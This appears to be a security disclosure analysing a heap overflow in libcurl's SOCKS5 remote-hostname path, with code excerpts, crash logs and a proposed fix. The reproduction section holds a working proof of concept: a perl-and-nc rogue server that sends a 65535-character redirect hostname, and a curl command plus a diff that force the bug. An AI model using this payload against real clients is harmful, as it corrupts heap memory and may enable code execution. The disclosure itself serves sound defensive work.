The SOCKS5 state machine can be manipulated by a remote attacker to overflow heap memory if four conditions are met:
libcurl is supposed to disable SOCKS5 remote hostname resolution for hostnames longer than 255 characters, but a state machine bug can prevent this.
For example, a Tor user runs a libcurl application with redirect following enabled and connects to a rogue onion server. The server replies with a payload in the Location: header that causes a crash or worse.
`do_SOCKS` initializes the local variable `socks5_resolve_local` depending on the `CURLPROXY_` name. There are two relevant names for this state machine:

- `CURLPROXY_SOCKS5` (SOCKS5 with local resolve of dest host)
- `CURLPROXY_SOCKS5_HOSTNAME` (SOCKS5 with remote resolve of dest host)

```c
bool socks5_resolve_local =
  (conn->socks_proxy.proxytype == CURLPROXY_SOCKS5) ? TRUE : FALSE;
```
In this scenario the name is `CURLPROXY_SOCKS5_HOSTNAME`, so `socks5_resolve_local` is initialized to `FALSE`.
The `do_SOCKS` state machine is entered for the first time for the connection, and `sx->state` is `CONNECT_SOCKS_INIT` (which happens to be the first label). In that state the hostname length is checked. If the name is too long to resolve remotely (>255), `socks5_resolve_local` is set to `TRUE`.
```c
/* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */
if(!socks5_resolve_local && hostname_len > 255) {
  infof(data, "SOCKS5: server resolving disabled for hostnames of "
        "length > 255 [actual len=%zu]", hostname_len);
  socks5_resolve_local = TRUE;
}
```
The local variable `socks5_resolve_local` is changed. Because it is a local variable, though, it is re-initialized from the proxy type on every call to `do_SOCKS`. Subsequent calls are in a different state and do not repeat the length check, so the change is lost. ==This is the bug.==
In this scenario the hostname is longer than 255 characters and `do_SOCKS` is on a subsequent call, which means `socks5_resolve_local` remains `FALSE`. This can happen by chance or be forced by an attacker.
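To make the control flow concrete, here is a heavily simplified model of the bug. It is a sketch, not libcurl code. `toy_do_socks`, `struct toy_sx` and the `TOY_*` states are hypothetical names. They only mirror the shape of `do_SOCKS`: a state field that persists across calls, plus a resolve flag that is a local variable.

```c
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical, heavily simplified model of the do_SOCKS control flow.
   The names are illustrative only; they are not libcurl's. */
enum toy_state { TOY_INIT, TOY_READ_HELLO, TOY_REQ_INIT, TOY_DONE };
enum toy_result { TOY_PENDING, TOY_RESOLVE_LOCAL, TOY_RESOLVE_REMOTE };

struct toy_sx {
  enum toy_state state;  /* persists across calls, like sx->state */
  bool hello_arrived;    /* has the proxy's method-selection reply arrived? */
};

/* One call into the state machine. The resolve decision is held in a
   local variable, so it is recomputed from the proxy type on every call. */
static enum toy_result toy_do_socks(struct toy_sx *sx, bool proxytype_is_socks5,
                                    size_t hostname_len)
{
  bool resolve_local = proxytype_is_socks5;  /* reset on every call */

  switch(sx->state) {
  case TOY_INIT:
    /* Only this state applies the >255 fallback... */
    if(!resolve_local && hostname_len > 255)
      resolve_local = true;
    sx->state = TOY_READ_HELLO;
    /* FALLTHROUGH */
  case TOY_READ_HELLO:
    if(!sx->hello_arrived)
      return TOY_PENDING;  /* ...and the fallback is lost on this return */
    sx->state = TOY_REQ_INIT;
    /* FALLTHROUGH */
  case TOY_REQ_INIT:
    sx->state = TOY_DONE;
    return resolve_local ? TOY_RESOLVE_LOCAL : TOY_RESOLVE_REMOTE;
  default:
    return TOY_PENDING;
  }
}
```

Suppose the proxy's reply is already there on the first call. The fallback survives, and a 300-character name is resolved locally. If the reply arrives later, the second call starts with the flag reset and picks remote resolution for the same name.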
The client “hello” SOCKS packet, which lists the available methods, is sent to the server. State `CONNECT_SOCKS_READ_INIT` => `CONNECT_SOCKS_READ` is entered to parse the server “hello” packet (method selection reply). The server has not yet replied, so `do_SOCKS` returns `CURLPX_OK`.
```c
CONNECT_SOCKS_READ_INIT:
  case CONNECT_SOCKS_READ_INIT:
    sx->outstanding = 2; /* expect two bytes */
    sx->outp = socksreq; /* store it here */
    /* FALLTHROUGH */
  case CONNECT_SOCKS_READ:
    presult = socks_state_recv(cf, sx, data, CURLPX_RECV_CONNECT,
                               "initial SOCKS5 response");
    if(CURLPX_OK != presult)
      return presult;
    else if(sx->outstanding) {
      /* remain in reading state */
      return CURLPX_OK;
    }
    else if(socksreq[0] != 5) {
      failf(data, "Received invalid version in initial SOCKS5 response.");
      return CURLPX_BAD_VERSION;
    }
    else if(socksreq[1] == 0) {
      /* DONE! No authentication needed. Send request. */
      sxstate(sx, data, CONNECT_REQ_INIT);
      goto CONNECT_REQ_INIT;
    }
```
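The two bytes this state waits for are the RFC 1928 method-selection reply (VER, METHOD). Below is a minimal sketch of classifying that reply. `classify_method_reply` and the `HYP_HELLO_*` values are hypothetical names, not libcurl's. The sketch shows where the early return comes from: until both bytes have arrived there is nothing to decide, so the only possible answer is "still waiting".

```c
#include <stddef.h>

/* Hypothetical classification of the RFC 1928 method-selection reply. */
enum hyp_hello {
  HYP_HELLO_INCOMPLETE,     /* fewer than two bytes received so far */
  HYP_HELLO_BAD_VERSION,    /* VER is not 5 */
  HYP_HELLO_NO_AUTH,        /* METHOD X'00': no authentication required */
  HYP_HELLO_NO_ACCEPTABLE,  /* METHOD X'FF': no acceptable methods */
  HYP_HELLO_OTHER_METHOD    /* any other method, e.g. X'02' username/password */
};

static enum hyp_hello classify_method_reply(const unsigned char *reply, size_t n)
{
  if(n < 2)
    return HYP_HELLO_INCOMPLETE;  /* keep waiting, like sx->outstanding != 0 */
  if(reply[0] != 5)
    return HYP_HELLO_BAD_VERSION;
  if(reply[1] == 0x00)
    return HYP_HELLO_NO_AUTH;
  if(reply[1] == 0xFF)
    return HYP_HELLO_NO_ACCEPTABLE;
  return HYP_HELLO_OTHER_METHOD;
}
```

The incomplete case corresponds to the `sx->outstanding` branch above. A proxy under the attacker's control can force it simply by holding back its reply.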
On a subsequent call, `do_SOCKS` is in the same state, waiting for the initial server reply. The reply is valid in this scenario, so the state machine will `goto CONNECT_REQ_INIT`. That in turn will `goto CONNECT_RESOLVE_REMOTE`, since `socks5_resolve_local` is `FALSE`.
```c
CONNECT_REQ_INIT:
  case CONNECT_REQ_INIT:
    if(socks5_resolve_local) {
      enum resolve_t rc = Curl_resolv(data, sx->hostname, sx->remote_port,
                                      TRUE, &dns);
      if(rc == CURLRESOLV_ERROR)
        return CURLPX_RESOLVE_HOST;
      if(rc == CURLRESOLV_PENDING) {
        sxstate(sx, data, CONNECT_RESOLVING);
        return CURLPX_OK;
      }
      sxstate(sx, data, CONNECT_RESOLVED);
      goto CONNECT_RESOLVED;
    }
    goto CONNECT_RESOLVE_REMOTE;
```
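In `CONNECT_RESOLVE_REMOTE` the hostname is copied into the `socksreq` buffer. The code assumes the hostname is at most 255 characters, which, as discussed above, is not guaranteed. For a longer name, the one-byte length field receives only a truncated value from `(char) hostname_len`, while `memcpy` still copies all `hostname_len` bytes.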
```c
    else {
      socksreq[len++] = 3;
      socksreq[len++] = (char) hostname_len; /* one byte address length */
      memcpy(&socksreq[len], sx->hostname, hostname_len); /* w/o NULL */
      len += hostname_len;
    }
    infof(data, "SOCKS5 connect to %s:%d (remotely resolved)",
          sx->hostname, sx->remote_port);
```
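For contrast, here is a minimal sketch of encoding an RFC 1928 CONNECT request with the domain-name address type (ATYP 3). It validates the length before anything is copied. `socks5_encode_connect` is a hypothetical helper, not libcurl's API, and it assumes the caller passes the destination port in host byte order.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper (not libcurl's API): encode an RFC 1928 CONNECT
   request with ATYP 3 (domain name) into buf. Returns the number of bytes
   written, or 0 if the name cannot be encoded or does not fit in bufsize. */
static size_t socks5_encode_connect(unsigned char *buf, size_t bufsize,
                                    const char *host, unsigned short port)
{
  size_t hostname_len = strlen(host);
  size_t needed;

  /* The domain name is prefixed by a one-byte length, so 1..255 only. */
  if(hostname_len == 0 || hostname_len > 255)
    return 0;

  /* VER CMD RSV ATYP (4) + length byte (1) + name + port (2) */
  needed = 4 + 1 + hostname_len + 2;
  if(needed > bufsize)
    return 0;

  buf[0] = 5;  /* VER: SOCKS5 */
  buf[1] = 1;  /* CMD: CONNECT */
  buf[2] = 0;  /* RSV: must be zero */
  buf[3] = 3;  /* ATYP: domain name */
  buf[4] = (unsigned char)hostname_len;  /* safe: checked <= 255 above */
  memcpy(&buf[5], host, hostname_len);   /* no NUL terminator on the wire */
  buf[5 + hostname_len] = (unsigned char)(port >> 8);    /* network order */
  buf[6 + hostname_len] = (unsigned char)(port & 0xff);
  return needed;
}
```

Both checks happen before the first write. An oversized name therefore fails cleanly instead of producing a truncated length byte followed by an unbounded copy.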
`socksreq` points to the temporary download buffer (i.e., `data->state.buffer`). That buffer was repurposed to send and receive the SOCKS negotiation, since the transfer is not yet downloading.
If the hostname is longer than the space remaining in the buffer, the copy overflows it. If the hostname fills the remaining space exactly without exceeding it, the overflow happens when the buffer is next written to.
Regardless, at this point earlier checks guarantee two things. The hostname length is at most 65535 (`MAX_URL_LEN`), and the full size of the buffer is at least `data->set.buffer_size + 1`:
```c
else if(strlen(data->state.up.hostname) > MAX_URL_LEN) {
  failf(data, "Too long host name (maximum is %d)", MAX_URL_LEN);
  return CURLE_URL_MALFORMAT;
}
```

```c
CURLcode Curl_preconnect(struct Curl_easy *data)
{
  if(!data->state.buffer) {
    data->state.buffer = malloc(data->set.buffer_size + 1);
    /* ... */
```
`data->set.buffer_size` varies. Before the allocation above, libcurl sets `data->set.buffer_size` to a default of 16384 (see `READBUFFER_SIZE`, aka `CURL_MAX_WRITE_SIZE`), which the user may have overridden via `CURLOPT_BUFFERSIZE`. A significant example is the curl tool. It uses `CURLOPT_BUFFERSIZE` to set the size to its own default of 102400, or to the user's `--limit-rate` value if that is smaller than 100k.
Two buffer size configurations are likely in wide use:

- 16384+1, for libcurl apps that do not set `CURLOPT_BUFFERSIZE`
- 102400+1, for curl tool commands without a low `--limit-rate`

The former buffer can be overflowed and the latter cannot: 16384+1 < 65535 < 102400+1.
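The comparison can be checked with a few lines of arithmetic. This sketch assumes the request is written from the start of the buffer with the RFC 1928 layout: VER, CMD, RSV, ATYP, one length byte, the name, then a two-byte port. Under that assumption the longest accepted hostname produces 65535 + 7 bytes. `HYP_MAX_URL_LEN`, `socks5_request_size` and `can_overflow` are hypothetical names.

```c
#include <stdbool.h>
#include <stddef.h>

/* Mirrors MAX_URL_LEN (65535) as described in the text; hypothetical name. */
#define HYP_MAX_URL_LEN 65535u

/* VER + CMD + RSV + ATYP (4) + length byte (1) + port (2), per RFC 1928. */
#define SOCKS5_CONNECT_OVERHEAD 7u

/* Bytes the remote-resolve path would write for a hostname of this length. */
static size_t socks5_request_size(size_t hostname_len)
{
  return SOCKS5_CONNECT_OVERHEAD + hostname_len;
}

/* True if the longest hostname that passes the MAX_URL_LEN check produces a
   request larger than an allocation of buffer_size + 1 bytes. */
static bool can_overflow(size_t buffer_size)
{
  return socks5_request_size(HYP_MAX_URL_LEN) > buffer_size + 1;
}
```

The same check explains why the reproduction below passes `--limit-rate 16384`. That option brings the curl tool's buffer down to the libcurl default, which is small enough to overflow.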
The characters allowed in the hostname depend on whether libcurl was built with IDN support. With IDN support, no IDN conversion is attempted as long as the hostname contains only characters < 0x80. Higher-value characters seem very unlikely to pass through, though that would depend on the IDN library. Without IDN support the characters pass through; for example, `Location: http://\xff\r\n` will pass through.
```c
bool Curl_is_ASCII_name(const char *hostname)
{
  /* get an UNSIGNED local version of the pointer */
  const unsigned char *ch = (const unsigned char *)hostname;

  if(!hostname) /* bad input, consider it ASCII! */
    return TRUE;

  while(*ch) {
    if(*ch++ & 0x80)
      return FALSE;
  }
  return TRUE;
}
```

```c
#ifdef USE_IDN
  /* Check name for non-ASCII and convert hostname if we can */
  if(!Curl_is_ASCII_name(host->name)) {
    char *decoded;
    CURLcode result = idn_decode(host->name, &decoded);
    /* ... */
```
The attacker needs to control the hostname. For example, the user has set `CURLOPT_FOLLOWLOCATION` (`--location` for the curl tool) so that libcurl follows redirects, and the attacker controls the hostname in the `Location:` header.
The attacker needs the state machine to be delayed, as discussed earlier. For example, the attacker controls the SOCKS server and delays the initial server hello.
The attacker probably needs to know how large `data->set.buffer_size` is and how memory is typically allocated, such as what comes after `data->state.buffer` in the heap. For example, the attacker has a copy of the program that uses libcurl and can debug it in a similar environment.
```
Unhandled exception at 0x6e1557be (libcurld.dll) in curld.exe: 0xC0000005: Access violation reading location 0x41414141.
```

Refer to attached screenshot Capture.PNG.

```
HEAP[curld.exe]: Heap block at 005F8200 modified at 005FC22D past requested size of 4025
```

Note that 4025 is hexadecimal. In decimal it is 16421, which is 16384+1 plus heap guard bytes.
```shell
while true; do { perl -e 'print ("HTTP/1.1 301 Moved\r\nContent-Length: 0\r\nConnection: Close\r\nLocation: http://");print("A"x65535);print("\r\n\r\n")'; sleep 2; } | nc -4l [yourip] 8000; done
```

Start a SOCKS5 server on [remoteip] (remote, for the latency) and run curl repeatedly until it reads from 0x41414141 (AAAAA…):

```shell
curl -v --limit-rate 16384 --location --proxy socks5h://[remoteip]:1080 http://[yourip]:8000
```

If a remote SOCKS server does not add enough latency, you would have to modify the server's source or force the delay in the libcurl source, for example:
```diff
   case CONNECT_SOCKS_READ:
+    {
+      /* int, not bool: with a C99 _Bool, ++x stays 1, so ++x == 2 is never true */
+      static int x = 0;
+      if(++x == 2)
+        return CURLPX_OK;
+    }
     presult = socks_state_recv(cf, sx, data, CURLPX_RECV_CONNECT,
                                "initial SOCKS5 response");
```
Refer to attached patch curl_security_fix.patch. It fixes the issue by changing the remote resolve check to return the error `CURLPX_LONG_HOSTNAME` if the destination hostname is longer than 255 characters.
If the state machine is not delayed and works as intended, the resolution is made locally. In my opinion that is a privacy violation, because a local DNS query could deanonymize a user who specifically requested socks5h. My patch does not allow it.
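The following sketch shows the decision the patch describes, under stated assumptions. The result codes and `struct hyp_socks_state` are hypothetical stand-ins for libcurl's types. The decision is stored in per-connection state rather than a local variable, so later calls cannot lose it. The sketch illustrates the approach described above (refuse, rather than fall back to local DNS); it is not the contents of curl_security_fix.patch.

```c
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical result codes standing in for libcurl's CURLproxycode. */
enum hyp_proxycode { HYP_PX_OK = 0, HYP_PX_LONG_HOSTNAME };

/* Hypothetical per-connection state: unlike a local variable,
   this survives across calls to the state machine. */
struct hyp_socks_state {
  bool resolve_local;
};

/* Decide once, in the initial state, how the destination is resolved.
   A name longer than 255 under remote resolution (socks5h) is an error
   rather than a silent switch to local DNS. */
static enum hyp_proxycode hyp_socks5_init(struct hyp_socks_state *sx,
                                          bool proxytype_is_socks5,
                                          size_t hostname_len)
{
  sx->resolve_local = proxytype_is_socks5;
  if(!sx->resolve_local && hostname_len > 255)
    return HYP_PX_LONG_HOSTNAME;  /* RFC 1928 length byte cannot hold it */
  return HYP_PX_OK;
}
```

Failing early also removes the privacy concern: a socks5h user never triggers a local lookup, whether or not the negotiation is delayed.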
If the state machine is delayed, the resolution is made remotely with a malformed SOCKS packet. The attacker has written to the heap and has likely overwritten in-use data that comes after `data->state.buffer`. It is undefined behavior at best and possible RCE at worst.
I think that if libcurl was built with IDN support, the worst case is much harder to achieve because only certain bytes can appear in the hostname.